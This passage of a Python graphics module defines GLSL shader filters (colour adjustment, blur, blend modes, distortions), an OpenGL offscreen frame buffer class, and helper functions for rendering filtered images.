vec4 p = texture2D(src, gl_TexCoord[0].xy);
vec3 hsb = rgb2hsb(p.rgb);
hsb.x = hsb.x + m;
gl_FragColor = vec4(hsb2rgb(hsb).xyz, p.a);
}''')
class BrightnessAdjustment(Filter):
def __init__(self, texture, m=1.0):
self.shader = _adjustment[BRIGHTNESS]
self.texture = texture
self.m = m
def push(self):
self.shader.set("m", float(self.m-1))
self.shader.push()
class ContrastAdjustment(Filter):
def __init__(self, texture, m=1.0):
self.shader = _adjustment[CONTRAST]
self.texture = texture
self.m = m
def push(self):
self.shader.set("m", float(self.m))
self.shader.push()
class SaturationAdjustment(Filter):
def __init__(self, texture, m=1.0):
self.shader = _adjustment[SATURATION]
self.texture = texture
self.m = m
def push(self):
self.shader.set("m", float(max(self.m, 0)))
self.shader.push()
class HueAdjustment(Filter):
def __init__(self, texture, m=0.0):
self.shader = _adjustment[HUE]
self.texture = texture
self.m = m
def push(self):
self.shader.set("m", float(self.m));
self.shader.push()
#--- BRIGHTPASS --------------------------------------------------------------------------------------
# Note: the magic numbers 0.2125, 0.7154, 0.0721 represent how (in RGB)
# green contributes the most to luminosity while blue hardly contributes anything.
# Thus, luminance L = R*0.2125 + G*0.7154 + B*0.0721
_brightpass = shader(fragment='''
uniform sampler2D src;
uniform float threshold;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
float L = dot(p.rgb, vec3(0.2125, 0.7154, 0.0721)); // luminance
gl_FragColor = (L > threshold)? vec4(p.rgb, p.a) : vec4(0.0, 0.0, 0.0, p.a);
}''')
class BrightPass(Filter):
def __init__(self, texture, threshold=0.5):
self.shader = _brightpass
self.texture = texture
self.threshold = threshold
def push(self):
self.shader.set("threshold", float(self.threshold));
self.shader.push()
#--- BLUR --------------------------------------------------------------------------------------------
# Based on "Gaussian Blur Filter Shader" (2008),
# http://www.gamerendering.com/2008/10/11/gaussian-blur-filter-shader/
# Blurring occurs in two steps (requiring an FBO): horizontal blur and vertical blur.
# Separating these two steps reduces the problem to linear complexity (i.e. it is faster).
glsl_blur = '''
uniform sampler2D src;
uniform int kernel;
uniform float radius;
void main() {
vec2 v = gl_TexCoord[0].xy;
vec4 p = vec4(0.0);
float n = float(kernel * kernel);
for (int i=1; i<kernel; i++) {
float a = float(i) * radius;
float b = float(kernel - i) / n;
p += texture2D(src, vec2(v.x%s, v.y%s)) * b;
p += texture2D(src, vec2(v.x%s, v.y%s)) * b;
}
p += texture2D(src, vec2(v.x, v.y)) * float(kernel) / n;
gl_FragColor = p;
}'''
_blur = {
"horizontal": shader(fragment=glsl_blur % ("-a","","+a","")), # vary v.x
"vertical" : shader(fragment=glsl_blur % ("","-a","","+a")) # vary v.y
}
class HorizontalBlur(Filter):
def __init__(self, texture, kernel=9, scale=1.0):
self.shader = _blur["horizontal"]
self.texture = texture
self.kernel = kernel
self.scale = scale
def push(self):
self.shader.set("kernel", int(self.kernel));
self.shader.set("radius", float(self.scale) / self.texture.width)
self.shader.push()
class VerticalBlur(Filter):
def __init__(self, texture, kernel=9, scale=1.0):
self.shader = _blur["vertical"]
self.texture = texture
self.kernel = kernel
self.scale = scale
def push(self):
self.shader.set("kernel", int(self.kernel));
self.shader.set("radius", float(self.scale) / self.texture.height)
self.shader.push()
# It is useful to have a blur in a single pass as well,
# which we can use as a parameter for the image() command.
# However, for a simple 3x3 in separate steps => 6 calculations, single pass => 9 calculations.
_blur["gaussian3x3"] = shader(fragment='''
uniform sampler2D src;
uniform vec2 radius;
void main(void) {
float dx = radius.x;
float dy = radius.y;
vec2 v = gl_TexCoord[0].xy;
vec4 p = vec4(0.0);
p = 4.0 * texture2D(src, v);
p += 2.0 * texture2D(src, v + vec2(+dx, 0.0));
p += 2.0 * texture2D(src, v + vec2(-dx, 0.0));
p += 2.0 * texture2D(src, v + vec2(0.0, +dy));
p += 2.0 * texture2D(src, v + vec2(0.0, -dy));
p += 1.0 * texture2D(src, v + vec2(+dx, +dy));
p += 1.0 * texture2D(src, v + vec2(-dx, +dy));
p += 1.0 * texture2D(src, v + vec2(-dx, -dy));
p += 1.0 * texture2D(src, v + vec2(+dx, -dy));
gl_FragColor = p / 16.0;
}''')
class Gaussian3x3Blur(Filter):
def __init__(self, texture, scale=1.0):
self.shader = _blur["gaussian3x3"]
self.texture = texture
self.scale = scale
def push(self):
x = float(self.scale) / self.texture.width
y = float(self.scale) / self.texture.height
self.shader.set("radius", vec2(x, y))
self.shader.push()
#--- COMPOSITING -------------------------------------------------------------------------------------
# Compositing function.
# It will be reused in alpha compositing and blending filters below.
# It prepares pixels p1 and p2, which need to be mixed into vec4 p.
glsl_compositing = '''
uniform sampler2D src1;
uniform sampler2D src2;
uniform vec2 extent;
uniform vec2 offset;
uniform vec2 ratio;
uniform float alpha;
void main() {
vec2 v1 = gl_TexCoord[0].xy;
vec2 v2 = v1 * ratio - offset * extent;
vec4 p1 = texture2D(src1, v1.xy);
vec4 p2 = texture2D(src2, v2.xy);
if (v2.x < 0.0 ||
v2.y < 0.0 ||
v2.x > extent.x + 0.001 ||
v2.y > extent.y + 0.001) {
gl_FragColor = p1;
return;
}
vec4 p = vec4(0.0);
%s
gl_FragColor = p;
}'''
class Compositing(Filter):
def __init__(self, shader, texture, blend, alpha=1.0, dx=0, dy=0):
""" A filter that mixes a base image (the destination) with a blend image (the source).
Used to implement alpha compositing and blend modes.
- dx: the horizontal offset (in pixels) of the blend layer.
- dy: the vertical offset (in pixels) of the blend layer.
"""
self.shader = shader
self.texture = texture
self.blend = blend
self.alpha = alpha
self.dx = dx
self.dy = dy
def push(self):
w = float(self.blend.width)
h = float(self.blend.height)
w2 = float(ceil2(w))
h2 = float(ceil2(h))
dx = float(self.dx) / w
dy = float(self.dy) / h
glActiveTexture(GL_TEXTURE0)
glBindTexture(self.texture.target, self.texture.id)
glActiveTexture(GL_TEXTURE1)
glBindTexture(self.blend.target, self.blend.id)
glActiveTexture(GL_TEXTURE0)
self.shader.set("src1", 0)
self.shader.set("src2", 1)
self.shader.set("extent", vec2(w/w2, h/h2)) # Blend extent.
self.shader.set("offset", vec2(dx, dy)) # Blend offset.
self.shader.set("ratio", vec2(*ratio2(self.texture, self.blend))) # Image-blend proportion.
self.shader.set("alpha", self.alpha)
self.shader.push()
#--- ALPHA TRANSPARENCY ------------------------------------------------------------------------------
_alpha = {}
_alpha["transparency"] = shader(fragment='''
uniform sampler2D src;
uniform float alpha;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
gl_FragColor = vec4(p.rgb, p.a * alpha);
}''')
_alpha["mask"] = shader(fragment=glsl_compositing % '''
p = vec4(p1.rgb, p1.a * (p2.r * p2.a * alpha));
'''.strip())
class AlphaTransparency(Filter):
def __init__(self, texture, alpha=1.0):
self.shader = _alpha["transparency"]
self.texture = texture
self.alpha = alpha
def push(self):
self.shader.set("alpha", float(max(0, min(1, self.alpha))))
self.shader.push()
class AlphaMask(Compositing):
def __init__(self, texture, blend, alpha=1.0, dx=0, dy=0):
Compositing.__init__(self, _alpha["mask"], texture, blend, alpha, dx, dy)
self.shader = _alpha["mask"]
#--- BLEND MODES -------------------------------------------------------------------------------------
# Based on "Photoshop math with GLSL shaders" (2009), Romain Dura,
# http://blog.mouaif.org/?p=94
ADD = "add" # Pixels are added.
SUBTRACT = "subtract" # Pixels are subtracted.
LIGHTEN = "lighten" # Lightest value for each pixel.
DARKEN = "darken" # Darkest value for each pixel.
MULTIPLY = "multiply" # Pixels are multiplied, resulting in a darker image.
SCREEN = "screen" # Pixels are inverted/multiplied/inverted, resulting in a brighter picture.
OVERLAY = "overlay" # Combines multiply and screen: light parts become ligher, dark parts darker.
HARDLIGHT = "hardlight" # Same as overlay, but uses the blend instead of base image for luminance.
HUE = "hue" # Hue from the blend image, brightness and saturation from the base image.
# If the blend is opaque (alpha=1.0), swap base and blend.
# This way lighten, darken, multiply and screen appear the same as in Photoshop and Core Image.
_blendx = '''if (p2.a == 1.0) { vec4 p3=p1; p1=p2; p2=p3; }
'''
# Blending operates on RGB values, the A needs to be handled separately.
# Where both images are transparent, their transparency is blended.
# Where the base image is fully transparent, the blend image appears source over.
# There is a subtle transition at transparent edges, which makes the edges less jagged.
glsl_blend = glsl_compositing % '''
vec3 w = vec3(1.0); // white
%s
p = mix(p1, clamp(p, 0.0, 1.0), p2.a * alpha);
p = (v1.x * ratio.x > 1.0 || v1.y * ratio.y > 1.0)? p1 : p;
p = (p1.a < 0.25)? p * p1.a + p2 * (1.0-p1.a) : p;
'''.strip()
_blend = {}
_blend[ADD] = 'p = vec4(p1.rgb + p2.rgb, 1.0);'
_blend[SUBTRACT] = 'p = vec4(p1.rgb + p2.rgb - 1.0, 1.0);'
_blend[LIGHTEN] = _blendx + 'p = vec4(max(p1.rgb, p2.rgb), 1.0);'
_blend[DARKEN] = _blendx + 'p = vec4(min(p1.rgb, p2.rgb), 1.0);'
_blend[MULTIPLY] = _blendx + 'p = vec4(p1.rgb * p2.rgb, 1.0);'
_blend[SCREEN] = _blendx + 'p = vec4(w - (w - p1.rgb) * (w - p2.rgb), 1.0);'
_blend[OVERLAY] = '''
float L = dot(p1.rgb, vec3(0.2125, 0.7154, 0.0721)); // luminance
vec4 a = vec4(2.0 * p1.rgb * p2.rgb, 1.0);
vec4 b = vec4(w - 2.0 * (w - p1.rgb) * (w - p2.rgb), 1.0);
p = (L < 0.45)? a : (L > 0.55)? b : vec4(mix(a.rgb, b.rgb, (L - 0.45) * 10.0), 1.0);
'''
_blend[HARDLIGHT] = _blend[OVERLAY].replace("dot(p1", "dot(p2")
_blend[HUE] = '''
vec3 h1 = rgb2hsb(p1.rgb);
vec3 h2 = rgb2hsb(p2.rgb);
p = vec4(hsb2rgb(vec3(h2.x, h1.yz)).rgb, p1.a);
'''
for f in _blend.keys():
src = glsl_blend % _blend[f].strip()
src = f==HUE and glsl_rgb2hsb + glsl_hsb2rgb + src or src # Hue blend requires rgb2hsb() function.
_blend[f] = shader(fragment=src)
class Blend(Compositing):
def __init__(self, mode, texture, blend, alpha=1.0, dx=0, dy=0):
Compositing.__init__(self, _blend[mode], texture, blend, alpha, dx, dy)
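# Usage sketch (not part of the original module): blending two textures with MULTIPLY;
# `base` and `overlay` are assumed to be pyglet textures loaded elsewhere.
#
#     f = Blend(MULTIPLY, base, overlay, alpha=0.8)
#     f.push()
#     # ... draw `base` here; the installed shader mixes in `overlay` ...
#     f.pop()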
#--- DISTORTION --------------------------------------------------------------------------------------
# Based on "PhotoBooth Demystified" (2007), Libero Spagnolini,
# http://dem.ocracy.org/libero/photobooth/
PINCH = "pinch" # Radius grows faster near the center of the effect.
TWIRL = "twirl" # Decreasing offset is added to the angle while moving down the radius.
SPLASH = "splash" # Light-tunnel effect by capping the radius.
BUMP = "bump" # Radius grows slower near the center of the effect.
DENT = "dent"
FISHEYE = "fisheye"
STRETCH = "stretch"
MIRROR = "mirror"
# Distortion function.
# - vec2 offset: horizontal and vertical offset from the image center (-0.5 to +0.5).
# - vec2 extent: the actual size of the image (0.0-1.0) in the texture.
# Textures have a size power of 2 (512, 1024, ...) but the actual image may be smaller.
# We need to know the extent of the image in the texture to calculate its center.
# - float ratio: the ratio between width and height, so the effect doesn't get stretched.
# - float m: the magnitude of the effect (e.g. radius, ...)
# - float i: the intensity of the effect (e.g. number of rotations, ...)
# - vec2 n: a normalized texture space between -1.0 and 1.0 (instead of 0.0-1.0).
glsl_distortion = '''
uniform sampler2D src;
uniform vec2 offset;
uniform vec2 extent;
uniform float ratio;
uniform float m;
uniform float i;
void main() {
vec2 v = gl_TexCoord[0].xy;
vec2 d = extent + extent * offset;
vec2 n = 2.0 * v - 1.0 * d;
n.x *= ratio;
%s
n.x /= ratio;
v = n / 2.0 + 0.5 * d;
%s
gl_FragColor = p;
}'''
# Polar coordinates.
# Most of the effects are based on simple angle and radius transformations.
# After the transformations, convert back to cartesian coordinates n.
glsl_polar = '''
float r = length(n);
float phi = atan(n.y, n.x);
%s
n = vec2(r*cos(phi), r*sin(phi));
'''.strip()
# For most effects, pixels are not wrapped around the edges.
# The second version wraps, with respect to the extent of the actual image in its power-of-2 texture.
# The third version wraps with a flipped image (transition).
glsl_wrap = (
'''vec4 p = (v.x < 0.0 || v.y < 0.0 || v.x > 0.999 || v.y > 0.999)? vec4(0.0) : texture2D(src, v);''',
'''
v.x = (v.x >= extent.x - 0.001)? mod(v.x, extent.x) - 0.002 : max(v.x, 0.001);
    v.y = (v.y >= extent.y - 0.001)? mod(v.y, extent.y) - 0.002 : max(v.y, 0.001);
vec4 p = texture2D(src, v);'''.strip(),
'''
v.x = (v.x >= extent.x - 0.001)? (extent.x - (v.x-extent.x)) - 0.002 : max(v.x, 0.001);
v.y = (v.y >= extent.y - 0.001)? (extent.y - (v.y-extent.y)) - 0.002 : max(v.y, 0.001);
vec4 p = texture2D(src, v);'''.strip())
_distortion = {}
_distortion[BUMP] = 'r = r * smoothstep(i, m, r);'
_distortion[DENT] = 'r = 2.0 * r - r * smoothstep(0.0, m, r/i);'
_distortion[PINCH] = 'r = pow(r, m/i) * m;'
_distortion[FISHEYE] = 'r = r * r / sqrt(2.0);'
_distortion[SPLASH] = 'if (r > m) r = m;'
_distortion[TWIRL] = 'phi = phi + (1.0 - smoothstep(-m, m, r)) * i;'
_distortion[MIRROR] = '''
if (m > 0.0) { n.x += offset.x * extent.x * ratio; n.x = n.x * sign(n.x); }
if (i > 0.0) { n.y += offset.y * extent.y; n.y = n.y * sign(n.y); }
'''.strip()
_distortion[STRETCH] = '''
vec2 s = sign(n);
n = abs(n);
n = (1.0-i) * n + i * smoothstep(m*0.25, m, n) * n;
n = s * n;
'''.strip()
for f in (BUMP, DENT, PINCH, FISHEYE, SPLASH, TWIRL):
_distortion[f] = shader(fragment=glsl_distortion % (glsl_polar % _distortion[f], glsl_wrap[0]))
for f in (STRETCH, MIRROR):
_distortion[f] = shader(fragment=glsl_distortion % ( _distortion[f], glsl_wrap[2]))
class Distortion(Filter):
def __init__(self, effect, texture, dx=0, dy=0, m=1.0, i=1.0):
""" Distortion filter with dx, dy offset from the center (between -0.5 and 0.5),
magnitude m as the radius of effect, intensity i as the depth of the effect.
"""
self.shader = _distortion[effect]
self.texture = texture
self.dx = dx
self.dy = dy
self.m = m
self.i = i
# Center offset can also be set in absolute coordinates (e.g. pixels):
def _get_abs_dx(self):
return int(self.dx * self.texture.width)
def _get_abs_dy(self):
return int(self.dy * self.texture.height)
def _set_abs_dx(self, v):
self.dx = float(v) / self.texture.width
def _set_abs_dy(self, v):
self.dy = float(v) / self.texture.height
abs_dx = property(_get_abs_dx, _set_abs_dx)
abs_dy = property(_get_abs_dy, _set_abs_dy)
def push(self):
w = float(self.texture.width)
h = float(self.texture.height)
w2 = float(ceil2(w))
h2 = float(ceil2(h))
self.shader.set("extent", vec2(w/w2, h/h2))
self.shader.set("offset", vec2(float(2*self.dx), float(2*self.dy)))
self.shader.set("ratio", w2/h2)
self.shader.set("m", float(self.m))
self.shader.set("i", float(self.i))
self.shader.push()
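# Usage sketch (not part of the original module): a twirl centered slightly off-center;
# `img` is assumed to be a pyglet texture, and the magnitude/intensity values are arbitrary.
#
#     f = Distortion(TWIRL, img, dx=0.1, dy=0.0, m=0.75, i=radians(180))
#     f.push()
#     # ... draw `img` here ...
#     f.pop()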
#=====================================================================================================
#--- FRAME BUFFER OBJECT -----------------------------------------------------------------------------
# Based on "Frame Buffer Object 101" (2006), Rob Jones,
# http://www.gamedev.net/reference/articles/article2331.asp
_UID = 0
def _uid():
# Each FBO has a unique ID.
global _UID; _UID+=1; return _UID;
def _texture(width, height):
# Returns an empty texture of the given width and height.
return Texture.create(width, height)
def glCurrentViewport(x=None, y=None, width=None, height=None):
""" Returns a (x, y, width, height)-tuple with the current viewport bounds.
If x, y, width and height are given, set the viewport bounds.
"""
# Why? To switch between the size of the onscreen canvas and the offscreen buffer.
# The canvas could be 256x256 while an offscreen buffer could be 1024x1024.
# Without switching the viewport, information from the buffer would be lost.
if x is not None and y is not None and width is not None and height is not None:
glViewport(x, y, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(x, width, y, height, -1, 1)
glMatrixMode(GL_MODELVIEW)
xywh = (GLint*4)(); glGetIntegerv(GL_VIEWPORT, xywh)
return tuple(xywh)
# The FBO stack keeps track of nested FBO's.
# When OffscreenBuffer.pop() is called, we revert to the previous buffer.
# Usually, this is the onscreen canvas, but in a render() function that contains
# filters or nested render() calls, this is the previous FBO.
_FBO_STACK = []
class OffscreenBufferError(Exception):
pass
class OffscreenBuffer(object):
def __init__(self, width, height):
""" "FBO" is an OpenGL extension to do "Render to Texture", drawing in an offscreen buffer.
It is useful as a place to chain multiple shaders,
since each shader has its own program and we can only install one program at a time.
"""
self.id = c_uint(_uid())
try: glGenFramebuffersEXT(1, byref(self.id))
except:
raise OffscreenBufferError, "offscreen buffer not supported."
self.texture = None
self._viewport = (None, None, None, None) # The canvas bounds, set in OffscreenBuffer.push().
self._active = False
self._init(width, height)
#self._init_depthbuffer()
def _init(self, width, height):
self.texture = _texture(int(width), int(height))
@property
def width(self):
return self.texture.width
@property
def height(self):
return self.texture.height
@property
def active(self):
return self._active
def push(self):
""" Between push() and pop(), all drawing is done offscreen in OffscreenBuffer.texture.
The offscreen buffer has its own transformation state,
so any translate(), rotate() etc. does not affect the onscreen canvas.
"""
_FBO_STACK.append(self)
glBindTexture(self.texture.target, self.texture.id)
glBindFramebufferEXT(GL_FRAMEBUFFER_EXT, self.id.value)
glFramebufferTexture2DEXT(
GL_FRAMEBUFFER_EXT,
GL_COLOR_ATTACHMENT0_EXT,
self.texture.target,
self.texture.id,
self.texture.level
)
# FBO's can fail when not supported by the graphics hardware,
# or when supplied an image of size 0 or unequal width/height.
# Check after glBindFramebufferEXT() and glFramebufferTexture2DEXT().
if glCheckFramebufferStatusEXT(GL_FRAMEBUFFER_EXT) != GL_FRAMEBUFFER_COMPLETE_EXT:
msg = self.texture.width == self.texture.height == 0 and "width=0, height=0." or ""
            raise OffscreenBufferError(msg)
# Separate the offscreen from the onscreen transform state.
# Separate the offscreen from the onscreen canvas size.
self._viewport = glCurrentViewport()
glPushMatrix()
glLoadIdentity()
glCurrentViewport(0, 0, self.texture.width, self.texture.height)
glColor4f(1.0,1.0,1.0,1.0)
# FBO's work with a simple GL_LINE_SMOOTH anti-aliasing.
# The instructions on how to enable framebuffer multisampling are pretty clear:
# (http://www.opengl.org/wiki/GL_EXT_framebuffer_multisample)
# but glRenderbufferStorageMultisampleEXT doesn't appear to work (yet),
# plus there is a performance drop.
glEnable(GL_LINE_SMOOTH)
# Blending transparent images in a transparent FBO is a bit tricky
        # because alpha is premultiplied: an image with 50% transparency
        # will come out 25% transparent with glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA).
# http://www.opengl.org/discussion_boards/ubbthreads.php?ubb=showflat&Number=257630
# http://www.openframeworks.cc/forum/viewtopic.php?f=9&t=2215
# This blend mode gives better results:
glEnable(GL_BLEND)
glBlendFuncSeparate(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
self._active = True
def pop(self):
""" Reverts to the onscreen canvas.
The contents of the offscreen buffer can be retrieved with OffscreenBuffer.texture.
"""
# Switch to onscreen canvas size and transformation state.
# Switch to onscreen canvas.
# Reset to the normal blending mode.
_FBO_STACK.pop(-1)
glCurrentViewport(*self._viewport)
glPopMatrix()
glBindFramebufferEXT(GL_FRAMEBUFFER_EXT, _FBO_STACK and _FBO_STACK[-1].id or 0)
glBlendFuncSeparate(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
#glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self._active = False
def render(self):
""" Executes the drawing commands in OffscreenBuffer.draw() offscreen and returns image.
This is useful if you have a class that inherits from FBO with a draw() method.
"""
self.push()
self.draw()
self.pop()
return self.texture
def draw(self):
pass
def slice(self, x, y, width, height):
""" Returns a portion of the offscreen buffer as an image.
"""
return self.texture.get_region(x, y, width, height)
def reset(self, width=None, height=None):
""" Resizes the offscreen buffer by attaching a new texture to it.
This will destroy the contents of the previous buffer.
If you do not explicitly reset the buffer, the contents from previous drawing
            between OffscreenBuffer.push() and OffscreenBuffer.pop() are retained.
"""
if self._active:
            raise OffscreenBufferError("can't reset offscreen buffer when active")
if width is None:
width = self.width
if height is None:
height = self.height
self._init(width, height)
def clear(self):
glClear(GL_COLOR_BUFFER_BIT)
glClear(GL_DEPTH_BUFFER_BIT)
glClear(GL_STENCIL_BUFFER_BIT)
def _init_depthbuffer(self):
self._depthbuffer = c_uint(_uid())
glGenRenderbuffersEXT(1, byref(self._depthbuffer))
glBindRenderbufferEXT(GL_RENDERBUFFER_EXT, self._depthbuffer)
glRenderbufferStorageEXT(GL_RENDERBUFFER_EXT, GL_DEPTH_COMPONENT, self.width, self.height)
glFramebufferRenderbufferEXT(
GL_FRAMEBUFFER_EXT,
GL_DEPTH_ATTACHMENT_EXT,
GL_RENDERBUFFER_EXT,
self._depthbuffer
)
def __del__(self):
try:
if glDeleteFramebuffersEXT:
glDeleteFramebuffersEXT(1, self.id)
if glDeleteRenderbuffersEXT and hasattr(self, "_depthbuffer"):
glDeleteRenderbuffersEXT(1, self._depthbuffer)
except:
pass
FBO = OffscreenBuffer
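# Example: a minimal push()/pop() sketch of the workflow described in the docstrings above.
# Illustrative only and not called anywhere; the 512x512 size is an arbitrary placeholder.
def _example_offscreen_buffer():
    buffer = OffscreenBuffer(512, 512)
    buffer.push()   # drawing commands issued here render into buffer.texture, not the canvas
    buffer.clear()
    buffer.pop()    # revert to the onscreen canvas
    return buffer.texture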
#=====================================================================================================
#--- OFFSCREEN RENDERING -----------------------------------------------------------------------------
# Uses an offscreen buffer to render filters and drawing commands to images.
try:
_buffer = OffscreenBuffer(640, 480)
except OffscreenBufferError:
_buffer = None
from context import Image, texture
def filter(img, filter=None, clear=True):
""" Returns a new Image object with the given filter applied to it.
- img : an image that can be passed to the image() command.
- filter: an instance of the Filter class, with parameters set.
- clear : if True, clears the contents of the offscreen buffer and resizes it to the image.
"""
# For file paths, textures and Pixel objects, create an Image first.
if not isinstance(img, Image):
img = Image(img)
# Reuse main _buffer when possible, otherwise create one on the fly
# (this will be necessary when filter() or render() is nested inside render()).
if not _buffer or _buffer.active:
buffer = OffscreenBuffer(img.texture.width, img.texture.height)
elif clear:
buffer = _buffer
buffer.reset(img.texture.width, img.texture.height)
else:
buffer = _buffer
buffer.push()
if filter != None:
filter.texture = img.texture # Register the current texture with the filter.
filter.push()
# This blend mode gives better results for transparent images:
glBlendFuncSeparate(GL_ONE, GL_ONE_MINUS_SRC_ALPHA, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
# Note: Image.alpha and Image.color attributes won't work here,
# because the shader overrides the default drawing behavior.
# Instead, add the transparent() and colorize() filters to the chain.
img.draw(0, 0)
if filter != None:
filter.pop()
buffer.pop()
return img.copy(texture=buffer.texture)
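# Example: a minimal sketch of filter() with one of the Filter classes defined above.
# Illustrative only and not called anywhere; "photo.png" is a placeholder path.
def _example_filter():
    img = Image("photo.png")
    return filter(img, Invert(img.texture))  # equivalent to the invert() helper below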
class RenderedImage(Image):
def draw(self, *args, **kwargs):
# Textures rendered in the FBO look slightly washed out.
# The render() command yields a RenderedImage object,
        # whose draw() method uses a blending trick to correct the colors:
glBlendFunc(GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
Image.draw(self, *args, **kwargs)
glBlendFuncSeparate(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
def save(self, path):
# XXX Colors will appear washed out in the exported image.
Image.save(self, path)
def render(function, width, height, clear=True, **kwargs):
""" Returns an Image object from a function containing drawing commands (i.e. a procedural image).
This is useful when, for example, you need to render filters on paths.
- function: a function containing drawing commands.
- width : width of the offscreen canvas.
- height : height of the offscreen canvas.
- clear : when False, retains the contents of the offscreen canvas, without resizing it.
"""
# Reuse main _buffer when possible, otherwise create one on the fly
# (this will be necessary when render() is nested inside another render()).
if not _buffer or _buffer.active:
buffer = OffscreenBuffer(width, height)
elif clear:
buffer = _buffer
buffer.reset(width, height)
else:
buffer = _buffer
buffer.push()
function(**kwargs)
buffer.pop()
return RenderedImage(buffer.texture)
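# Example: a minimal sketch of render() with a procedural drawing function.
# Illustrative only and not called anywhere; "photo.png" is a placeholder path.
def _example_render():
    img = Image("photo.png")
    def draw():
        img.draw(0, 0)
    return render(draw, 256, 256)  # a RenderedImage containing the drawing commands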
#--- OFFSCREEN FILTERS -------------------------------------------------------------------------------
# Images are rendered offscreen with the filter applied, and the new image returned.
def invert(img):
""" Returns an image with inverted colors (e.g. white becomes black).
"""
return filter(img, Invert(img.texture))
def solid(width, height, fill=(0,0,0,0)):
""" Generates an image filled with a solid color.
"""
clr = tuple([int(v*255) for v in fill])
return Image(SolidColorImagePattern(clr).create_image(width, height).get_texture())
def gradient(width, height, clr1=(0,0,0,1), clr2=(1,1,1,1), type=LINEAR):
""" Generates a gradient image and returns it.
- width : the width of the image.
- height: the height of the image.
- clr1 : a Color (or a tuple) that defines the bottom (or inner) color.
- clr2 : a Color (or a tuple) that defines the top (or outer) color.
- type : either LINEAR or RADIAL.
"""
f = type==LINEAR and LinearGradient or RadialGradient
img = Image(_texture(ceil2(width), ceil2(height)))
img = filter(img, f(img.texture, vec4(*clr1), vec4(*clr2)))
# Reuse main _buffer when possible, otherwise create one on the fly
# (this will be necessary when filter() or render() is nested inside render()).
if not _buffer or _buffer.active:
buffer = OffscreenBuffer(img.texture.width, img.texture.height)
else:
buffer = _buffer
# If the given dimensions are not power of 2,
# scale down the gradient to the given dimensions.
if width != img.width or height != img.height:
buffer.reset(width, height)
buffer.push()
img.width = width
img.height = height
img.draw()
buffer.pop()
return img.copy(texture=buffer.texture)
return img
def colorize(img, color=(1,1,1,1), bias=(0,0,0,0)):
""" Applies a colorize filter to the image and returns the colorized image.
- color: a Color (or a tuple) of RGBA-values to multiply with each image pixel.
- bias : a Color (or a tuple) of RGBA-values to add to each image pixel.
"""
return filter(img, Colorize(img.texture, vec4(*color), vec4(*bias)))
def adjust(img, brightness=1.0, contrast=1.0, saturation=1.0, hue=0.0):
""" Applies color adjustment filters to the image and returns the adjusted image.
- brightness: the overall lightness or darkness (0.0 is a black image).
- contrast : the difference in brightness between regions.
- saturation: the intensity of the colors (0.0 is a grayscale image).
- hue : the shift in hue (1.0 is 360 degrees on the color wheel).
"""
if brightness != 1: img = filter(img.texture, BrightnessAdjustment(img, brightness))
if contrast != 1: img = filter(img.texture, ContrastAdjustment(img, contrast))
if saturation != 1: img = filter(img.texture, SaturationAdjustment(img, saturation))
if hue != 0: img = filter(img.texture, HueAdjustment(img, hue))
return img
def desaturate(img):
""" Returns a grayscale version of the image.
"""
return filter(img, SaturationAdjustment(img, 0.0))
grayscale = desaturate
def brightpass(img, threshold=0.3):
""" Applies a bright pass filter, where pixels whose luminance falls below the threshold are black.
"""
return filter(img, BrightPass(img.texture, threshold))
def blur(img, kernel=5, scale=1.0, amount=1, cumulative=False):
""" Applies a blur filter to the image and returns the blurred image.
- kernel: the size of the convolution matrix (e.g. 9 = 9x9 convolution kernel).
- scale : the radius of the effect, a higher scale will create a rougher but faster blur.
- amount: the number of the times to apply the blur filter;
because blurred layers are pasted on top of each other cumulatively
this produces a nicer effect than repeatedly using blur() in a for-loop
(which blurs the blurred).
"""
for i in range(amount):
clear = i==0 or not cumulative
img = filter(img, HorizontalBlur(img.texture, kernel, scale), clear=clear)
img = filter(img, VerticalBlur(img.texture, kernel, scale), clear=clear)
return img
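# Example: a minimal sketch chaining the offscreen filters above.
# Illustrative only and not called anywhere; "photo.png" is a placeholder path.
def _example_blur_pipeline():
    img = Image("photo.png")
    img = adjust(img, brightness=1.1, saturation=0.5)
    img = blur(img, kernel=9, scale=1.0, amount=2)
    return img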
def transparent(img, alpha=1.0):
""" Returns a transparent version of the image.
- alpha: the percentage of the original opacity of the image (0.0-1.0).
"""
return filter(img, AlphaTransparency(img.texture, alpha))
def _q(img):
# For images functioning as masks or blend layers,
    # apply any quad distortion and then use the texture of the distorted image.
if img.quad != (0,0,0,0,0,0,0,0):
return filter(img)
return img
def mask(img1, img2, alpha=1.0, dx=0, dy=0):
""" Applies the second image as an alpha mask to the first image.
The second image must be a grayscale image, where the black areas
make the first image transparent (e.g. punch holes in it).
- dx: horizontal offset (in pixels) of the alpha mask.
- dy: vertical offset (in pixels) of the alpha mask.
"""
return filter(img1, AlphaMask(img1.texture, _q(img2).texture, alpha, dx, dy))
def blend(img1, img2, mode=OVERLAY, alpha=1.0, dx=0, dy=0):
""" Applies the second image as a blend layer with the first image.
- dx: horizontal offset (in pixels) of the blend layer.
- dy: vertical offset (in pixels) of the blend layer.
"""
return filter(img1, Blend(mode, img1, _q(img2).texture, alpha, dx, dy))
def add(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(ADD, img1, _q(img2).texture, alpha, dx, dy))
def subtract(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(SUBTRACT, img1, _q(img2).texture, alpha, dx, dy))
def lighten(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(LIGHTEN, img1, _q(img2).texture, alpha, dx, dy))
def darken(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(DARKEN, img1, _q(img2).texture, alpha, dx, dy))
def multiply(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(MULTIPLY, img1, _q(img2).texture, alpha, dx, dy))
